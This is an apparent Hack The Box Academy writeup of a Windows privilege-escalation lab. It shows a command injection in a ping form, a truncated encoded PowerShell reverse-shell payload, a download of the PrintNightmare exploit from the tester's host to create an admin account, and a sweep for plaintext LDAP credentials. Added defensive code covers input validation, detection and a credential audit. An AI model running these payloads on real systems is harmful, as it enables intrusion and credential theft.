shadiff

Windows PrivEsc

Feb 19th, 2024
---
title: HTB Academy | Windows Privilege Escalation Skills Assessment I
date: 2023-08-01 18:55:00 -0500
categories: [Writeups, HTB]
tags: [pentest, htb, attack, windows, privilege]
---

## Challenge

During a penetration test against the INLANEFREIGHT organization, you encounter a non-domain joined Windows server host that suffers from an unpatched command injection vulnerability. After gaining a foothold, you come across credentials that may be useful for lateral movement later in the assessment and uncover another flaw that can be leveraged to escalate privileges on the target host.

For this assessment, assume that your client has a relatively mature patch/vulnerability management program but is understaffed and unaware of many of the best practices around configuration management, which could leave a host open to privilege escalation.

Enumerate the host (starting with an Nmap port scan to identify accessible ports/services), leverage the command injection flaw to gain reverse shell access, escalate privileges to NT AUTHORITY\SYSTEM level or similar access, and answer the questions below to complete this portion of the assessment.

- Which two KBs are installed on the target system? (Answer format: 3210000&3210060)
- Find the password for the ldapadmin account somewhere on the system.
- Escalate privileges and submit the contents of the flag.txt file on the Administrator Desktop.
- After escalating privileges, locate a file named confidential.txt. Submit the contents of this file.

## Our Host
`10.10.14.30`

## Target
`10.129.143.15`

## Enumeration

We started with an Nmap scan of the target.
```bash
$ sudo nmap 10.129.143.15 -Pnp -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-01 17:12 BST
Nmap scan report for 10.129.143.15
Host is up (0.0071s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: DEV Connection Tester
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=WINLPE-SKILLS1-SRV
| Not valid before: 2023-07-31T15:26:14
|_Not valid after: 2024-01-30T15:26:14
|_ssl-date: 2023-08-01T16:12:56+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: WINLPE-SKILLS1-
| NetBIOS_Domain_Name: WINLPE-SKILLS1-
| NetBIOS_Computer_Name: WINLPE-SKILLS1-
| DNS_Domain_Name: WINLPE-SKILLS1-SRV
| DNS_Computer_Name: WINLPE-SKILLS1-SRV
| Product_Version: 10.0.14393
|_ System_Time: 2023-08-01T16:12:51+00:00
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2016 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 12.58 ms 10.10.14.1
2 11.91 ms 10.129.143.15

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.48 seconds
```
RDP was open, but we had no initial credentials. Browsing to the HTTP site, we found a ping utility with a text entry field and a submit button. We tried a command injection payload in the field:
```bash
ping 127.0.0.1|whoami
```
The response contained `iis apppool\defaultapppool`, confirming the page was vulnerable to command injection: the user input reaches a shell unsanitized, so the `|` chains a second command that runs as the IIS application pool identity.
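The flaw above is the classic shape of OS command injection: the target string is concatenated into a shell command. As an added example (not code from the HTB lab or the target application), here is a vulnerable handler beside a hardened one that validates the target as an IP address or hostname and passes it to `ping` as a single argument with no shell; the `-n` count flag is the Windows `ping` syntax, as on the target host.

```python
"""Input handling for a 'connection tester' that shells out to ping.
Vulnerable string building beside a hardened, validated argv call."""
import ipaddress
import re
import subprocess

# Characters that let a second command ride along on cmd.exe or a POSIX shell.
SHELL_METACHARS = re.compile(r"[|&;`$<>\n\r()]")
# RFC 1123 hostname labels; IP literals are validated separately via ipaddress.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)

def build_vulnerable_command(target):
    """Vulnerable: user input interpolated into a shell string.
    'ping 127.0.0.1|whoami' makes the shell run whoami as well."""
    return f"ping -n 1 {target}"

def validate_target(target):
    """Return the target if it is a bare IP address or hostname, else raise."""
    target = target.strip()
    if not target or SHELL_METACHARS.search(target):
        raise ValueError("target contains shell metacharacters")
    try:
        return str(ipaddress.ip_address(target))  # canonical IPv4/IPv6 literal
    except ValueError:
        pass
    if HOSTNAME_RE.match(target):
        return target
    raise ValueError("target is neither an IP address nor a hostname")

def is_injection_attempt(target):
    """True when the raw input would be rejected by validate_target."""
    try:
        validate_target(target)
        return False
    except ValueError:
        return True

def safe_ping(target):
    """Hardened: validated target passed as one argv element, shell=False.
    Even a stray '|' would reach ping as part of its argument, never a shell."""
    host = validate_target(target)
    result = subprocess.run(["ping", "-n", "1", host], capture_output=True, timeout=10)
    return result.returncode
```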
Next we injected a base64-encoded PowerShell reverse-shell one-liner through the same field:
```bash
127.0.0.1|powershell -e JABjAGwAaQBlAG4AdAAgA..<SNIP>...
```
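From the defender's side, both steps leave the same footprint: the IIS worker process spawns a shell, and the second one carries an encoded PowerShell command line. The following added example (not part of the lab or the writeup) walks the parent chain of constructed process-creation events so that `powershell.exe` is caught even when `cmd.exe` sits between it and `w3wp.exe`; the field names are an assumption modelled on Sysmon Event ID 1.

```python
"""Flag shells spawned under an IIS worker process from process-creation
events, walking ancestry rather than only the direct parent."""
import re

WEB_WORKERS = {"w3wp.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}")

B64 = "JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0AA=="  # constructed blob
EVENTS = [  # constructed sample telemetry, not real logs
    {"pid": 4100, "ppid": 900, "image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "user": r"IIS APPPOOL\DefaultAppPool", "cmdline": "w3wp.exe -ap DefaultAppPool"},
    {"pid": 4212, "ppid": 4100, "image": r"C:\Windows\System32\cmd.exe",
     "user": r"IIS APPPOOL\DefaultAppPool", "cmdline": "cmd.exe /c ping 127.0.0.1|whoami"},
    {"pid": 4305, "ppid": 4100, "image": r"C:\Windows\System32\cmd.exe",
     "user": r"IIS APPPOOL\DefaultAppPool",
     "cmdline": "cmd.exe /c ping 127.0.0.1|powershell -e " + B64},
    {"pid": 4310, "ppid": 4305,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "user": r"IIS APPPOOL\DefaultAppPool", "cmdline": "powershell -e " + B64},
    {"pid": 5000, "ppid": 1200, "image": r"C:\Windows\System32\cmd.exe",
     "user": r"WINLPE-SKILLS1-\htb-student", "cmdline": "cmd.exe"},  # benign
]

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def web_worker_ancestor(ev, by_pid):
    """Walk the parent chain; True if any ancestor is an IIS worker process."""
    seen, pid = set(), ev["ppid"]
    while pid in by_pid and pid not in seen:  # 'seen' guards against pid reuse loops
        seen.add(pid)
        if basename(by_pid[pid]["image"]) in WEB_WORKERS:
            return True
        pid = by_pid[pid]["ppid"]
    return False

def detect(events):
    """One finding per shell with a web worker anywhere in its ancestry;
    an encoded PowerShell command line raises the severity to high."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for ev in events:
        if basename(ev["image"]) in SHELLS and web_worker_ancestor(ev, by_pid):
            severity = "high" if ENCODED_FLAG.search(ev["cmdline"]) else "medium"
            findings.append({"pid": ev["pid"], "image": basename(ev["image"]),
                             "user": ev["user"], "severity": severity})
    return findings
```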
This gave us a low-privileged reverse shell running as the application pool identity. We ran `systeminfo` to get the OS details:
```powershell
PS C:\windows\system32\inetsrv> systeminfo

Host Name: WINLPE-SKILLS1-
OS Name: Microsoft Windows Server 2016 Standard
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00376-30821-30176-AA757
Original Install Date: 5/25/2021, 8:57:43 PM
System Boot Time: 8/1/2023, 8:26:00 AM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
[02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 3,179 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 3,899 MB
Virtual Memory: In Use: 900 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 2 Hotfix(s) Installed.
[01]: KB3199986
[02]: KB3200970
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0
DHCP Enabled: Yes
DHCP Server: 10.129.0.1
IP address(es)
[01]: 10.129.143.15
[02]: fe80::5da6:b6ab:3cd4:84fb
[03]: dead:beef::5da6:b6ab:3cd4:84fb
[04]: dead:beef::85
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
```
This told us the OS was build 10.0.14393 (Windows Server 2016) with only two hotfixes installed, KB3199986 and KB3200970, which answers the first question.

## Privilege Escalation

Several exploits were candidates for this build. We used [CVE-2021-1675 - PrintNightmare LPE (PowerShell)](https://github.com/calebstewart/CVE-2021-1675), downloading the `ps1` script onto the target from our host:
```powershell
PS C:\users\public\download> wget -Uri http://10.10.14.30:8000/CVE-2021-1675.ps1 -UseBasicParsing -outfile CVE-2021-1675.ps1
```
We then imported the module and ran it to create a new account, `adm1n`/`P@ssw0rd` (the script's default), in the local Administrators group:
```powershell
PS C:\users\public\download> Import-Module .\cve-2021-1675.ps1
PS C:\users\public\download> Invoke-Nightmare # add user `adm1n`/`P@ssw0rd`
```

## Search Credentials
We connected over RDP with the new admin account and started searching for credentials.
First we searched text and configuration files under `C:\Users` for the string `ldapadmin`:
```cmd
c:\Users>findstr /SIM /C:"ldapadmin" *.txt *.ini *.cfg *.config *.xml
Administrator\.ApacheDirectoryStudio\.metadata\.plugins\org.apache.directory.studio.connection.core\connections.xml
Administrator\.ApacheDirectoryStudio\.metadata\.plugins\org.apache.directory.studio.connection.ui\dialog_settings.xml
htb-student\.ApacheDirectoryStudio\.metadata\.plugins\org.apache.directory.studio.connection.core\connections.xml
htb-student\.ApacheDirectoryStudio\.metadata\.plugins\org.apache.directory.studio.connection.core\connections.xml-temp
htb-student\.ApacheDirectoryStudio\.metadata\.plugins\org.apache.directory.studio.connection.ui\dialog_settings.xml
```
Opening the first `connections.xml` gave us the password for the `ldapadmin` account, stored in plaintext in the `bindPassword` attribute of an Apache Directory Studio connection profile:
```xml
<?xml version="1.0" encoding="UTF-8"?>

<connections>
<connection id="21f81b55-9e67-4f2a-b9e7-1939d662f017" name="LDAP.inlanefreight.local" host="dc01.inlanefreight.local" port="389" encryptionMethod="NONE" authMethod="SIMPLE" bindPrincipal="ldapadmin" bindPassword="XX...X" saslRealm="" saslQop="AUTH" saslSecStrenght="HIGH" saslMutualAuth="false" krb5CredentialsConf="USE_NATIVE" krb5Config="DEFAULT" krb5ConfigFile="" krb5Realm="" krb5KdcHost="" krb5KdcPort="88" readOnly="false" timeout="30000">
...<SNIP>...
```
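The profile above is worth two findings on a hardening review: a saved `bindPassword`, and `encryptionMethod="NONE"` with simple bind, so the same credential also crosses the wire in cleartext. As an added example (not code from the lab), this audit parses the `connections.xml` format shown above and reports every profile that persists a password, rating unencrypted transport higher; the XML below is constructed after the page's snippet, with a placeholder in place of the real secret, and `find_connection_files` mirrors the `findstr` sweep for the same files.

```python
"""Audit Apache Directory Studio connection profiles for stored credentials."""
import xml.etree.ElementTree as ET
from pathlib import Path

SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<connections>
  <connection id="21f81b55-9e67-4f2a-b9e7-1939d662f017" name="LDAP.inlanefreight.local"
    host="dc01.inlanefreight.local" port="389" encryptionMethod="NONE"
    authMethod="SIMPLE" bindPrincipal="ldapadmin" bindPassword="PLACEHOLDER-SECRET"/>
  <connection id="c0ffee00-0000-4000-8000-000000000002" name="LDAPS.inlanefreight.local"
    host="dc02.inlanefreight.local" port="636" encryptionMethod="LDAPS"
    authMethod="SIMPLE" bindPrincipal="svc_ro" bindPassword=""/>
  <connection id="c0ffee00-0000-4000-8000-000000000003" name="kerberos"
    host="dc01.inlanefreight.local" port="389" encryptionMethod="START_TLS"
    authMethod="SASL_GSSAPI" bindPrincipal="" bindPassword=""/>
</connections>
"""  # constructed after the writeup's snippet; the password is a placeholder

def find_connection_files(users_dir):
    """Every Apache Directory Studio connections.xml under a Users directory
    (hypothetical helper; the profile lives in the user's home, as findstr showed)."""
    return sorted(Path(users_dir).glob("*/.ApacheDirectoryStudio/**/connections.xml"))

def audit_connections(xml_text):
    """One finding per <connection> that stores a non-empty bindPassword.
    Severity is 'high' when the transport is unencrypted, otherwise 'medium'."""
    root = ET.fromstring(xml_text)
    findings = []
    for conn in root.iter("connection"):
        password = conn.get("bindPassword", "")
        if not password:
            continue  # nothing persisted on disk for this profile
        unencrypted = conn.get("encryptionMethod", "NONE").upper() == "NONE"
        findings.append({
            "name": conn.get("name"),
            "host": conn.get("host"),
            "port": conn.get("port"),
            "principal": conn.get("bindPrincipal"),
            "auth": conn.get("authMethod"),
            "severity": "high" if unencrypted else "medium",
            "password_length": len(password),  # report presence, never the secret
        })
    return findings
```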
Then we searched for `confidential.txt`:
```cmd
c:\Users>dir /s confidential.txt
Volume in drive C has no label.
Volume Serial Number is 7029-F417

Directory of c:\Users\Administrator\Music

06/07/2021 12:41 PM 32 confidential.txt
1 File(s) 32 bytes

Total Files Listed:
1 File(s) 32 bytes
0 Dir(s) 18,834,948,096 bytes free
```

## References

https://academy.hackthebox.com/module/67/section/637

https://github.com/calebstewart/CVE-2021-1675